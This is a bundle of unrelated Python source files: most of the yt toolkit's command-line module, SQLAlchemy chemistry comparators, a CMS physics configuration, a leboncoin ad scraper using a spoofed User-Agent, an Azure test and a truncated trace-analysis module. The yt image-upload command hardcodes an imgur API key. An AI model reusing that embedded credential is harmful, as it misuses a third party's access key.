linear = dict(longname="--linear",
action="store_false",
dest="takelog",
help="Use linear scale for image"),
text = dict(short="-t", longname="--text",
action="store", type=str,
dest="text", default=None,
help="Textual annotation"),
field = dict(short="-f", longname="--field",
action="store", type=str,
dest="field", default="density",
help="Field to color by"),
weight = dict(short="-g", longname="--weight",
action="store", type=str,
dest="weight", default=None,
help="Field to weight projections with"),
cmap = dict(longname="--colormap",
action="store", type=str,
dest="cmap", default="algae",
help="Colormap name"),
zlim = dict(short="-z", longname="--zlim",
action="store", type=float,
dest="zlim", default=None,
nargs=2,
help="Color limits (min, max)"),
dex = dict(longname="--dex",
action="store", type=float,
dest="dex", default=None,
nargs=1,
help="Number of dex above min to display"),
width = dict(short="-w", longname="--width",
action="store", type=float,
dest="width", default=None,
help="Width in specified units"),
unit = dict(short="-u", longname="--unit",
action="store", type=str,
dest="unit", default='1',
help="Desired units"),
center = dict(short="-c", longname="--center",
action="store", type=float,
dest="center", default=None,
nargs=3,
help="Center, space separated (-1 -1 -1 for max)"),
max = dict(short="-m", longname="--max",
action="store_true",
dest="max",default=False,
help="Center the plot on the density maximum"),
bn = dict(short="-b", longname="--basename",
action="store", type=str,
dest="basename", default=None,
help="Basename of datasets"),
output = dict(short="-o", longname="--output",
action="store", type=str,
dest="output", default="frames/",
help="Folder in which to place output images"),
outputfn= dict(short="-o", longname="--output",
action="store", type=str,
dest="output", default=None,
help="File in which to place output"),
skip = dict(short="-s", longname="--skip",
action="store", type=int,
dest="skip", default=1,
help="Skip factor for outputs"),
proj = dict(short="-p", longname="--projection",
action="store_true",
dest="projection", default=False,
help="Use a projection rather than a slice"),
maxw = dict(longname="--max-width",
action="store", type=float,
dest="max_width", default=1.0,
help="Maximum width in code units"),
minw = dict(longname="--min-width",
action="store", type=float,
dest="min_width", default=50,
help="Minimum width in units of smallest dx (default: 50)"),
nframes = dict(short="-n", longname="--nframes",
action="store", type=int,
dest="nframes", default=100,
help="Number of frames to generate"),
slabw = dict(longname="--slab-width",
action="store", type=float,
dest="slab_width", default=1.0,
help="Slab width in specified units"),
slabu = dict(short="-g", longname="--slab-unit",
action="store", type=str,
dest="slab_unit", default='1',
help="Desired units for the slab"),
ptype = dict(longname="--particle-type",
action="store", type=int,
dest="ptype", default=2,
help="Particle type to select"),
agecut = dict(longname="--age-cut",
action="store", type=float,
dest="age_filter", default=None,
nargs=2,
help="Bounds for the field to select"),
uboxes = dict(longname="--unit-boxes",
action="store_true",
dest="unit_boxes",
help="Display heldsul unit boxes"),
thresh = dict(longname="--threshold",
action="store", type=float,
dest="threshold", default=None,
help="Density threshold"),
dm_only = dict(longname="--all-particles",
action="store_false",
dest="dm_only", default=True,
help="Use all particles"),
grids = dict(longname="--show-grids",
action="store_true",
dest="grids", default=False,
help="Show the grid boundaries"),
time = dict(longname="--time",
action="store_true",
dest="time", default=False,
help="Print time in years on image"),
contours = dict(longname="--contours",
action="store",type=int,
dest="contours", default=None,
help="Number of Contours for Rendering"),
contour_width = dict(longname="--contour_width",
action="store",type=float,
dest="contour_width", default=None,
help="Width of gaussians used for rendering."),
enhance = dict(longname="--enhance",
action="store_true",
dest="enhance", default=False,
help="Enhance!"),
valrange = dict(short="-r", longname="--range",
action="store", type=float,
dest="valrange", default=None,
nargs=2,
help="Range, space separated"),
up = dict(longname="--up",
action="store", type=float,
dest="up", default=None,
nargs=3,
help="Up, space separated"),
viewpoint = dict(longname="--viewpoint",
action="store", type=float,
dest="viewpoint", default=[1., 1., 1.],
nargs=3,
help="Viewpoint, space separated"),
pixels = dict(longname="--pixels",
action="store",type=int,
dest="pixels", default=None,
help="Number of Pixels for Rendering"),
halos = dict(longname="--halos",
action="store", type=str,
dest="halos",default="multiple",
help="Run halo profiler on a 'single' halo or 'multiple' halos."),
halo_radius = dict(longname="--halo_radius",
action="store", type=float,
dest="halo_radius",default=0.1,
help="Constant radius for profiling halos if using hop output files with no radius entry. Default: 0.1."),
halo_radius_units = dict(longname="--halo_radius_units",
action="store", type=str,
dest="halo_radius_units",default="1",
help="Units for radius used with --halo_radius flag. Default: '1' (code units)."),
halo_hop_style = dict(longname="--halo_hop_style",
action="store", type=str,
dest="halo_hop_style",default="new",
help="Style of hop output file. 'new' for yt_hop files and 'old' for enzo_hop files."),
halo_dataset = dict(longname="--halo_dataset",
action="store", type=str,
dest="halo_dataset",default=None,
help="HaloProfiler dataset."),
make_profiles = dict(longname="--make_profiles",
action="store_true", default=False,
help="Make profiles with halo profiler."),
make_projections = dict(longname="--make_projections",
action="store_true", default=False,
help="Make projections with halo profiler.")
)
def _get_yt_stack_date():
if "YT_DEST" not in os.environ:
print("Could not determine when yt stack was last updated.")
return
date_file = os.path.join(os.environ["YT_DEST"], ".yt_update")
if not os.path.exists(date_file):
print("Could not determine when yt stack was last updated.")
return
print("".join(file(date_file, 'r').readlines()))
print("To update all dependencies, run \"yt update --all\".")
def _update_yt_stack(path):
"Rerun the install script to updated all dependencies."
install_script = os.path.join(path, "doc/install_script.sh")
if not os.path.exists(install_script):
print()
print("Install script not found!")
print("The install script should be here: %s," % install_script)
print("but it was not.")
return
print()
print("We will now attempt to update the yt stack located at:")
print(" %s." % os.environ["YT_DEST"])
print()
print("[hit enter to continue or Ctrl-C to stop]")
try:
raw_input()
except:
sys.exit(0)
os.environ["REINST_YT"] = "1"
ret = subprocess.call(["bash", install_script])
print()
if ret:
print("The install script seems to have failed.")
print("Check the output above.")
else:
print("The yt stack has been updated successfully.")
print("Now get back to work!")
def get_yt_version():
try:
from yt.__hg_version__ import hg_version
return hg_version
except ImportError:
pass
import pkg_resources
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
if not os.path.isdir(os.path.join(path, ".hg")): return None
version = get_hg_version(path)
return version
# This code snippet is modified from Georg Brandl
def bb_apicall(endpoint, data, use_pass = True):
uri = 'https://api.bitbucket.org/1.0/%s/' % endpoint
# since bitbucket doesn't return the required WWW-Authenticate header when
# making a request without Authorization, we cannot use the standard urllib2
# auth handlers; we have to add the requisite header from the start
if data is not None:
data = urllib.parse.urlencode(data)
req = urllib.request.Request(uri, data)
if use_pass:
username = raw_input("Bitbucket Username? ")
password = getpass.getpass()
upw = '%s:%s' % (username, password)
req.add_header('Authorization', 'Basic %s' % base64.b64encode(upw).strip())
return urllib.request.urlopen(req).read()
class YTBugreportCmd(YTCommand):
name = "bugreport"
description = \
"""
Report a bug in yt
"""
def __call__(self, args):
print("===============================================================")
print()
print("Hi there! Welcome to the yt bugreport taker.")
print()
print("===============================================================")
print("At any time in advance of the upload of the bug, you should feel free")
print("to ctrl-C out and submit the bug report manually by going here:")
print(" http://bitbucket.org/yt_analysis/yt/issues/new")
print()
print("Also, in order to submit a bug through this interface, you")
print("need a Bitbucket account. If you don't have one, exit this ")
print("bugreport now and run the 'yt bootstrap_dev' command to create one.")
print()
print("Have you checked the existing bug reports to make")
print("sure your bug has not already been recorded by someone else?")
print(" http://bitbucket.org/yt_analysis/yt/issues?status=new&status=open")
print()
print("Finally, are you sure that your bug is, in fact, a bug? It might")
print("simply be a misunderstanding that could be cleared up by")
print("visiting the yt irc channel or getting advice on the email list:")
print(" http://yt-project.org/irc.html")
print(" http://lists.spacepope.org/listinfo.cgi/yt-users-spacepope.org")
print()
summary = raw_input("Press <enter> if you remain firm in your conviction to continue.")
print()
print()
print("Okay, sorry about that. How about a nice, pithy ( < 12 words )")
print("summary of the bug? (e.g. 'Particle overlay problem with parallel ")
print("projections')")
print()
try:
current_version = get_yt_version()
except:
current_version = "Unavailable"
summary = raw_input("Summary? ")
bugtype = "bug"
data = dict(title = summary, type=bugtype)
print()
print("Okay, now let's get a bit more information.")
print()
print("Remember that if you want to submit a traceback, you can run")
print("any script with --paste or --detailed-paste to submit it to")
print("the pastebin and then include the link in this bugreport.")
if "EDITOR" in os.environ:
print()
print("Press enter to spawn your editor, %s" % os.environ["EDITOR"])
loki = raw_input()
tf = tempfile.NamedTemporaryFile(delete=False)
fn = tf.name
tf.close()
popen = subprocess.call("$EDITOR %s" % fn, shell = True)
content = open(fn).read()
try:
os.unlink(fn)
except:
pass
else:
print()
print("Couldn't find an $EDITOR variable. So, let's just take")
print("take input here. Type up your summary until you're ready")
print("to be done, and to signal you're done, type --- by itself")
print("on a line to signal your completion.")
print()
print("(okay, type now)")
print()
lines = []
while 1:
line = raw_input()
if line.strip() == "---": break
lines.append(line)
content = "\n".join(lines)
content = "Reporting Version: %s\n\n%s" % (current_version, content)
endpoint = "repositories/yt_analysis/yt/issues"
data['content'] = content
print()
print("===============================================================")
print()
print("Okay, we're going to submit with this:")
print()
print("Summary: %s" % (data['title']))
print()
print("---")
print(content)
print("---")
print()
print("===============================================================")
print()
print("Is that okay? If not, hit ctrl-c. Otherwise, enter means")
print("'submit'. Next we'll ask for your Bitbucket Username.")
print("If you don't have one, run the 'yt bootstrap_dev' command.")
print()
loki = raw_input()
retval = bb_apicall(endpoint, data, use_pass=True)
import json
retval = json.loads(retval)
url = "http://bitbucket.org/yt_analysis/yt/issue/%s" % retval['local_id']
print()
print("===============================================================")
print()
print("Thanks for your bug report! Together we'll make yt totally bug free!")
print("You can view bug report here:")
print(" %s" % url)
print()
print("Keep in touch!")
print()
class YTHubRegisterCmd(YTCommand):
name = "hub_register"
description = \
"""
Register a user on the Hub: http://hub.yt-project.org/
"""
def __call__(self, args):
# We need these pieces of information:
# 1. Name
# 2. Email
# 3. Username
# 4. Password (and password2)
# 5. (optional) URL
# 6. "Secret" key to make it epsilon harder for spammers
if ytcfg.get("yt","hub_api_key") != "":
print("You seem to already have an API key for the hub in")
print("~/.yt/config . Delete this if you want to force a")
print("new user registration.")
print("Awesome! Let's start by registering a new user for you.")
print("Here's the URL, for reference: http://hub.yt-project.org/ ")
print()
print("As always, bail out with Ctrl-C at any time.")
print()
print("What username would you like to go by?")
print()
username = raw_input("Username? ")
if len(username) == 0: sys.exit(1)
print()
print("To start out, what's your name?")
print()
name = raw_input("Name? ")
if len(name) == 0: sys.exit(1)
print()
print("And your email address?")
print()
email = raw_input("Email? ")
if len(email) == 0: sys.exit(1)
print()
print("Please choose a password:")
print()
while 1:
password1 = getpass.getpass("Password? ")
password2 = getpass.getpass("Confirm? ")
if len(password1) == 0: continue
if password1 == password2: break
print("Sorry, they didn't match! Let's try again.")
print()
print()
print("Would you like a URL displayed for your user?")
print("Leave blank if no.")
print()
url = raw_input("URL? ")
print()
print("Okay, press enter to register. You should receive a welcome")
print("message at %s when this is complete." % email)
print()
loki = raw_input()
data = dict(name = name, email = email, username = username,
password = password1, password2 = password2,
url = url, zap = "rowsdower")
data = urllib.parse.urlencode(data)
hub_url = "https://hub.yt-project.org/create_user"
req = urllib.request.Request(hub_url, data)
try:
status = urllib.request.urlopen(req).read()
except urllib.error.HTTPError as exc:
if exc.code == 400:
print("Sorry, the Hub couldn't create your user.")
print("You can't register duplicate users, which is the most")
print("common cause of this error. All values for username,")
print("name, and email must be unique in our system.")
sys.exit(1)
except urllib.URLError as exc:
print("Something has gone wrong. Here's the error message.")
raise exc
print()
print("SUCCESS!")
print()
class YTInstInfoCmd(YTCommand):
name = ["instinfo", "version"]
args = (
dict(short="-u", longname="--update-source", action="store_true",
default = False,
help="Update the yt installation, if able"),
dict(short="-o", longname="--output-version", action="store",
default = None, dest="outputfile",
help="File into which the current revision number will be" +
"stored")
)
description = \
"""
Get some information about the yt installation
"""
def __call__(self, opts):
import pkg_resources
import yt
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
print()
print("yt module located at:")
print(" %s" % (path))
update_supp = False
if "YT_DEST" in os.environ:
spath = os.path.join(
os.environ["YT_DEST"], "src", "yt-supplemental")
if os.path.isdir(spath):
print("The supplemental repositories are located at:")
print(" %s" % (spath))
update_supp = True
vstring = get_yt_version()
if vstring == -1:
vstring = "unknown"
if vstring is not None:
print()
print("The current version and changeset for the code is:")
print()
print("---")
print("Version = %s" % yt.__version__)
print("Changeset = %s" % vstring.strip().decode("utf-8"))
print("---")
print()
if "site-packages" not in path:
print("This installation CAN be automatically updated.")
if opts.update_source:
update_hg(path)
print("Updated successfully.")
_get_yt_stack_date()
elif opts.update_source:
print()
print("YT site-packages not in path, so you must")
print("update this installation manually by committing and")
print("merging your modifications to the code before")
print("updating to the newest changeset.")
print()
if vstring is not None and opts.outputfile is not None:
open(opts.outputfile, "w").write(vstring)
class YTLoadCmd(YTCommand):
name = "load"
description = \
"""
Load a single dataset into an IPython instance
"""
args = ("ds", )
def __call__(self, args):
if args.ds is None:
print("Could not load file.")
sys.exit()
import yt.mods
import yt
import IPython
from distutils import version
if version.LooseVersion(IPython.__version__) <= version.LooseVersion('0.10'):
api_version = '0.10'
else:
api_version = '0.11'
local_ns = yt.mods.__dict__.copy()
local_ns['ds'] = args.ds
local_ns['pf'] = args.ds
local_ns['yt'] = yt
if api_version == '0.10':
shell = IPython.Shell.IPShellEmbed()
shell(local_ns = local_ns,
header =
"\nHi there! Welcome to yt.\n\nWe've loaded your dataset as 'ds'. Enjoy!"
)
else:
from IPython.config.loader import Config
import sys
cfg = Config()
# prepend sys.path with current working directory
sys.path.insert(0,'')
IPython.embed(config=cfg,user_ns=local_ns)
class YTMapserverCmd(YTCommand):
args = ("proj", "field", "weight",
dict(short="-a", longname="--axis", action="store", type=int,
dest="axis", default=0, help="Axis (4 for all three)"),
dict(short ="-o", longname="--host", action="store", type=str,
dest="host", default=None, help="IP Address to bind on"),
"ds",
)
name = "mapserver"
description = \
"""
Serve a plot in a GMaps-style interface
"""
def __call__(self, args):
if sys.version_info >= (3,0,0):
print("yt mapserver is disabled for Python 3.")
return -1
ds = args.ds
if args.axis == 4:
print("Doesn't work with multiple axes!")
return
if args.projection:
p = ProjectionPlot(ds, args.axis, args.field, weight_field=args.weight)
else:
p = SlicePlot(ds, args.axis, args.field)
from yt.gui.reason.pannable_map import PannableMapServer
mapper = PannableMapServer(p.data_source, args.field)
import yt.extern.bottle as bottle
bottle.debug(True)
if args.host is not None:
colonpl = args.host.find(":")
if colonpl >= 0:
port = int(args.host.split(":")[-1])
args.host = args.host[:colonpl]
else:
port = 8080
bottle.run(server='rocket', host=args.host, port=port)
else:
bottle.run(server='rocket')
class YTPastebinCmd(YTCommand):
name = "pastebin"
args = (
dict(short="-l", longname="--language", action="store",
default = None, dest="language",
help="Use syntax highlighter for the file in language"),
dict(short="-L", longname="--languages", action="store_true",
default = False, dest="languages",
help="Retrive a list of supported languages"),
dict(short="-e", longname="--encoding", action="store",
default = 'utf-8', dest="encoding",
help="Specify the encoding of a file (default is "
"utf-8 or guessing if available)"),
dict(short="-b", longname="--open-browser", action="store_true",
default = False, dest="open_browser",
help="Open the paste in a web browser"),
dict(short="-p", longname="--private", action="store_true",
default = False, dest="private",
help="Paste as private"),
dict(short="-c", longname="--clipboard", action="store_true",
default = False, dest="clipboard",
help="File to output to; else, print."),
dict(short="file", type=str),
)
description = \
"""
Post a script to an anonymous pastebin
"""
def __call__(self, args):
import yt.utilities.lodgeit as lo
lo.main(args.file, languages=args.languages, language=args.language,
encoding=args.encoding, open_browser=args.open_browser,
private=args.private, clipboard=args.clipboard)
class YTPastebinGrabCmd(YTCommand):
args = (dict(short="number", type=str),)
name = "pastebin_grab"
description = \
"""
Print an online pastebin to STDOUT for local use.
"""
def __call__(self, args):
import yt.utilities.lodgeit as lo
lo.main( None, download=args.number )
class YTNotebookUploadCmd(YTCommand):
args = (dict(short="file", type=str),)
description = \
"""
Upload an IPython notebook to hub.yt-project.org.
"""
name = "upload_notebook"
def __call__(self, args):
filename = args.file
if not os.path.isfile(filename):
raise IOError(filename)
if not filename.endswith(".ipynb"):
print("File must be an IPython notebook!")
return 1
import json
try:
t = json.loads(open(filename).read())['metadata']['name']
except (ValueError, KeyError):
print("File does not appear to be an IPython notebook.")
if len(t) == 0:
t = filename.strip(".ipynb")
from yt.utilities.minimal_representation import MinimalNotebook
mn = MinimalNotebook(filename, t)
rv = mn.upload()
print("Upload successful!")
print()
print("To access your raw notebook go here:")
print()
print(" %s" % (rv['url']))
print()
print("To view your notebook go here:")
print()
print(" %s" % (rv['url'].replace("/go/", "/nb/")))
print()
class YTPlotCmd(YTCommand):
args = ("width", "unit", "bn", "proj", "center", "zlim", "axis", "field",
"weight", "skip", "cmap", "output", "grids", "time", "ds", "max",
"log", "linear")
name = "plot"
description = \
"""
Create a set of images
"""
def __call__(self, args):
ds = args.ds
center = args.center
if args.center == (-1,-1,-1):
mylog.info("No center fed in; seeking.")
v, center = ds.find_max("density")
if args.max:
v, center = ds.find_max("density")
elif args.center is None:
center = 0.5*(ds.domain_left_edge + ds.domain_right_edge)
center = np.array(center)
if ds.dimensionality < 3:
dummy_dimensions = np.nonzero(ds.index.grids[0].ActiveDimensions <= 1)
axes = ensure_list(dummy_dimensions[0][0])
elif args.axis == 4:
axes = range(3)
else:
axes = [args.axis]
unit = args.unit
if unit is None:
unit = 'unitary'
if args.width is None:
width = None
else:
width = (args.width, args.unit)
for ax in axes:
mylog.info("Adding plot for axis %i", ax)
if args.projection:
plt = ProjectionPlot(ds, ax, args.field, center=center,
width=width,
weight_field=args.weight)
else:
plt = SlicePlot(ds, ax, args.field, center=center,
width=width)
if args.grids:
plt.annotate_grids()
if args.time:
time = ds.current_time.in_units("yr")
plt.annotate_text((0.2,0.8), 't = %5.2e yr'%time)
plt.set_cmap(args.field, args.cmap)
plt.set_log(args.field, args.takelog)
if args.zlim:
plt.set_zlim(args.field,*args.zlim)
ensure_dir_exists(args.output)
plt.save(os.path.join(args.output,"%s" % (ds)))
class YTRPDBCmd(YTCommand):
name = "rpdb"
description = \
"""
Connect to a currently running (on localhost) rpd session.
Commands run with --rpdb will trigger an rpdb session with any
uncaught exceptions.
"""
args = (
dict(short="-t", longname="--task", action="store",
default = 0, dest='task',
help="Open a web browser."),
)
def __call__(self, args):
from . import rpdb
rpdb.run_rpdb(int(args.task))
class YTNotebookCmd(YTCommand):
name = ["notebook"]
args = (
dict(short="-o", longname="--open-browser", action="store_true",
default = False, dest='open_browser',
help="Open a web browser."),
dict(short="-p", longname="--port", action="store",
default = 0, dest='port',
help="Port to listen on; defaults to auto-detection."),
dict(short="-prof", longname="--profile", action="store",
default = None, dest="profile",
help="The IPython profile to use when lauching the kernel."),
dict(short="-n", longname="--no-password", action="store_true",
default = False, dest='no_password',
help="If set, do not prompt or use a password."),
)
description = \
"""
Run the IPython Notebook
"""
def __call__(self, args):
kwargs = {}
try:
# IPython 1.0+
from IPython.html.notebookapp import NotebookApp
except ImportError:
# pre-IPython v1.0
from IPython.frontend.html.notebook.notebookapp import NotebookApp
print("You must choose a password so that others cannot connect to " \
"your notebook.")
pw = ytcfg.get("yt", "notebook_password")
if len(pw) == 0 and not args.no_password:
import IPython.lib
pw = IPython.lib.passwd()
print("If you would like to use this password in the future,")
print("place a line like this inside the [yt] section in your")
print("yt configuration file at ~/.yt/config")
print()
print("notebook_password = %s" % pw)
print()
elif args.no_password:
pw = None
if args.port != 0:
kwargs['port'] = int(args.port)
if args.profile is not None:
kwargs['profile'] = args.profile
if pw is not None:
kwargs['password'] = pw
app = NotebookApp(open_browser=args.open_browser,
**kwargs)
app.initialize(argv=[])
print()
print("***************************************************************")
print()
print("The notebook is now live at:")
print()
print(" http://127.0.0.1:%s/" % app.port)
print()
print("Recall you can create a new SSH tunnel dynamically by pressing")
print("~C and then typing -L%s:localhost:%s" % (app.port, app.port))
print("where the first number is the port on your local machine. ")
print()
print("If you are using %s on your machine already, try " \
"-L8889:localhost:%s" % (app.port, app.port))
print()
print("***************************************************************")
print()
app.start()
class YTStatsCmd(YTCommand):
args = ('outputfn','bn','skip','ds','field',
dict(longname="--max", action='store_true', default=False,
dest='max', help="Display maximum of field requested through -f option."),
dict(longname="--min", action='store_true', default=False,
dest='min', help="Display minimum of field requested through -f option."))
name = "stats"
description = \
"""
Print stats and max/min value of a given field (if requested),
for one or more datasets
(default field is density)
"""
def __call__(self, args):
ds = args.ds
ds.print_stats()
vals = {}
if args.field in ds.derived_field_list:
if args.max == True:
vals['min'] = ds.find_max(args.field)
print("Maximum %s: %0.5e at %s" % (args.field,
vals['min'][0], vals['min'][1]))
if args.min == True:
vals['max'] = ds.find_min(args.field)
print("Minimum %s: %0.5e at %s" % (args.field,
vals['max'][0], vals['max'][1]))
if args.output is not None:
t = ds.current_time * ds['years']
with open(args.output, "a") as f:
f.write("%s (%0.5e years)\n" % (ds, t))
if 'min' in vals:
f.write('Minimum %s is %0.5e at %s\n' % (
args.field, vals['min'][0], vals['min'][1]))
if 'max' in vals:
f.write('Maximum %s is %0.5e at %s\n' % (
args.field, vals['max'][0], vals['max'][1]))
class YTUpdateCmd(YTCommand):
args = ("all", )
name = "update"
description = \
"""
Update the yt installation to the most recent version
"""
def __call__(self, opts):
import pkg_resources
import yt
yt_provider = pkg_resources.get_provider("yt")
path = os.path.dirname(yt_provider.module_path)
print()
print("yt module located at:")
print(" %s" % (path))
update_supp = False
if "YT_DEST" in os.environ:
spath = os.path.join(
os.environ["YT_DEST"], "src", "yt-supplemental")
if os.path.isdir(spath):
print("The supplemental repositories are located at:")
print(" %s" % (spath))
update_supp = True
vstring = None
if "site-packages" not in path:
vstring = get_hg_version(path)
print()
print("The current version and changeset for the code is:")
print()
print("---")
print("Version = %s" % yt.__version__)
print("Changeset = %s" % vstring.strip().decode("utf-8"))
print("---")
print()
print("This installation CAN be automatically updated.")
update_hg(path, skip_rebuild=opts.reinstall)
print("Updated successfully.")
_get_yt_stack_date()
if opts.reinstall:
_update_yt_stack(path)
else:
print()
print("YT site-packages not in path, so you must")
print("update this installation manually by committing and")
print("merging your modifications to the code before")
print("updating to the newest changeset.")
print()
class YTUploadImageCmd(YTCommand):
args = (dict(short="file", type=str),)
description = \
"""
Upload an image to imgur.com. Must be PNG.
"""
name = "upload_image"
def __call__(self, args):
filename = args.file
if not filename.endswith(".png"):
print("File must be a PNG file!")
return 1
import base64, json, pprint
image_data = base64.b64encode(open(filename, 'rb').read())
api_key = 'f62d550859558f28c4c214136bc797c7'
parameters = {'key':api_key, 'image':image_data, type:'base64',
'caption': "",
'title': "%s uploaded by yt" % filename}
data = urllib.parse.urlencode(parameters).encode('utf-8')
req = urllib.request.Request('http://api.imgur.com/2/upload.json', data)
try:
response = urllib.request.urlopen(req).read().decode()
except urllib.error.HTTPError as e:
print("ERROR", e)
return {'uploaded':False}
rv = json.loads(response)
if 'upload' in rv and 'links' in rv['upload']:
print()
print("Image successfully uploaded! You can find it at:")
print(" %s" % (rv['upload']['links']['original']))
print()
print("If you'd like to delete it, visit this page:")
print(" %s" % (rv['upload']['links']['delete_page']))
print()
else:
print()
print("Something has gone wrong! Here is the server response:")
print()
pprint.pprint(rv)
def run_main():
args = parser.parse_args()
# The following is a workaround for a nasty Python 3 bug:
# http://bugs.python.org/issue16308
# http://bugs.python.org/issue9253
try:
getattr(args, "func")
except AttributeError:
parser.print_help()
sys.exit(0)
args.func(args)
if __name__ == "__main__": run_main()
|
from sqlalchemy import func
from sqlalchemy import types as sqltypes
from sqlalchemy.types import UserDefinedType
from sqlalchemy.sql import operators
class MolComparator(UserDefinedType.Comparator):
def hassubstruct(self, other):
return self.operate(
operators.custom_op('@>'), other, result_type=sqltypes.Boolean
)
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
def __eq__(self, other):
return self.operate(
operators.custom_op('@='), other, result_type=sqltypes.Boolean
)
class QMolComparator(UserDefinedType.Comparator):
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
class BfpComparator(UserDefinedType.Comparator):
def tanimoto_sml(self, other):
return self.operate(
operators.custom_op('%%'), other, result_type=sqltypes.Boolean
)
def dice_sml(self, other):
return self.operate(
operators.custom_op('#'), other, result_type=sqltypes.Boolean
)
class SfpComparator(UserDefinedType.Comparator):
def tanimoto_sml(self, other):
return self.operate(
operators.custom_op('%%'), other, result_type=sqltypes.Boolean
)
def dice_sml(self, other):
return self.operate(
operators.custom_op('#'), other, result_type=sqltypes.Boolean
)
def __add__(self, other):
return func.add(self.expr, other)
def __sub__(self, other):
return func.subtract(self.expr, other)
class ReactionComparator(UserDefinedType.Comparator):
def hassubstruct(self, other):
return self.operate(
operators.custom_op('@>'), other, result_type=sqltypes.Boolean
)
def hassubstructfp(self, other):
return self.operate(
operators.custom_op('?>'), other, result_type=sqltypes.Boolean
)
def issubstruct(self, other):
return self.operate(
operators.custom_op('<@'), other, result_type=sqltypes.Boolean
)
def issubstructfp(self, other):
return self.operate(
operators.custom_op('<?'), other, result_type=sqltypes.Boolean
)
def __eq__(self, other):
return self.operate(
operators.custom_op('@='), other, result_type=sqltypes.Boolean
)
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("OWNPARTICLES")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/user/geisler/RelValZmumuJets_Pt_20_300_PU_START53_V6-v1_GEN-SIM-RECO.root'),
secondaryFileNames = cms.untracked.vstring('file:/user/geisler/RelValZmumuJets_Pt_20_300_PU_START53_V6-v1_GEN-SIM-DIGI-RAW-HLTDEBUG.root'),
)
#process.source = cms.Source("PoolSource",
#fileNames = cms.untracked.vstring('file:/user/geisler/QCD_Pt-15to3000_Tune2C_Flat_8TeV_pythia8_AODSIM.root'),
#)
### conditions
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'START53_V11::All'
### standard includes
process.load('Configuration.StandardSequences.Services_cff')
process.load('Configuration.Geometry.GeometryPilot2_cff')
process.load("Configuration.StandardSequences.RawToDigi_cff")
process.load("Configuration.EventContent.EventContent_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("Configuration.StandardSequences.MagneticField_cff")
process.selectedPrimaryVertexQuality = cms.EDFilter("VertexSelector",
src = cms.InputTag('offlinePrimaryVertices'),
cut = cms.string("isValid & ndof >= 4 & chi2 > 0 & tracksSize > 0 & abs(z) < 24 & abs(position.Rho) < 2."),
filter = cms.bool(True),
)
### AssociationMap-specific includes
from CommonTools.RecoUtils.pf_pu_assomap_cfi import AssociationMaps
process.assMap = AssociationMaps.clone(
VertexCollection = cms.InputTag('selectedPrimaryVertexQuality'),
)
### FirstVertexTracks-specific includes
from CommonTools.RecoUtils.pf_pu_firstvertextracks_cfi import FirstVertexTracks
process.firstVertexTracks = FirstVertexTracks.clone(
AssociationMap = cms.InputTag('assMap'),
VertexCollection = cms.InputTag('selectedPrimaryVertexQuality'),
)
process.p = cms.Path(
process.selectedPrimaryVertexQuality *
process.assMap *
process.firstVertexTracks
)
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("myOutput.root"),
outputCommands = cms.untracked.vstring('drop *',
'keep *_*_*_RECO'),
)
process.out_step = cms.EndPath(process.output)
|
import scrapy
class LbcSpider(scrapy.Spider):
name = "lbc"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7'}
start_urls = ['https://www.leboncoin.fr/ventes_immobilieres/offres/ile_de_france']
def parse(self, response):
print('Spider lbc is active')
for ad_card in response.css("div.css-mi8a1d"):
yield {
'title': ad_card.css('p.css-1j9uane.e1koqxhm0::text').get(),
'price': ad_card.css('span.css-66vicj::text').get(),
'city_and_date' : ad_card.css('p._2k43C._137P-.P4PEa._3j0OU::text').get()
}
pass
next_page = 'https://www.leboncoin.fr'+ response.css('a._3-yvP:nth-child(3)').attrib['href']
if next_page is not None:
yield response.follow(next_page, callback = self.parse)
|
import cmazure.storage.account
import cmazure.storage.common
import cmazure.common
from cmazure.credentials import AzureCredentials
def test_create():
creds = AzureCredentials.make_from_environment()
storage_client = cmazure.storage.common.make_storage_client(creds)
resource_client = cmazure.common.make_resource_client(creds)
resource_group = cmazure.common.create_resource_group(resource_client,
"test-resource-group",
"westus")
cmazure.storage.account.use_account(storage_client, resource_group, "brighttestaccount")
|
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2015, ARM Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Functions Analysis Module """
from trappy.utils import listify
from analysis_module import AnalysisModule
class FunctionsAnalysis(AnalysisModule):
"""
Support for kernel functions profiling and analysis
:param trace: input Trace object
:type trace: :mod:`libs.utils.Trace`
"""
def __init__(self, trace):
super(FunctionsAnalysis, self).__init__(trace)
def plotProfilingStats(self, functions=None, metrics='avg'):
"""
Plot functions profiling metrics for the specified kernel functions.
For each speficied metric a barplot is generated which report the value
of the metric when the kernel function has been executed on each CPU.
By default all the kernel functions are plotted.
:param functions: the name of list of name of kernel functions to plot
:type functions: str or list(str)
:param metrics: the metrics to plot
avg - average execution time
time - total execution time
:type metrics: srt or list(str)
"""
if not hasattr(self._trace, '_functions_stats_df'):
self._log.warning('Functions stats data not available')
return
metrics = listify(metrics)
df = self._trace.data_frame.functions_stats(functions)
# Check that all the required metrics are acutally availabe
available_metrics = df.columns.tolist()
if not set(metrics).issubset(set(available_metrics)):
msg = 'Metrics {} not supported, available metrics are {}'\
.format(set(metrics) - set(available_metrics),
available_metrics)
raise ValueError(msg)
for metric in metrics:
if metric.upper() == 'AVG':
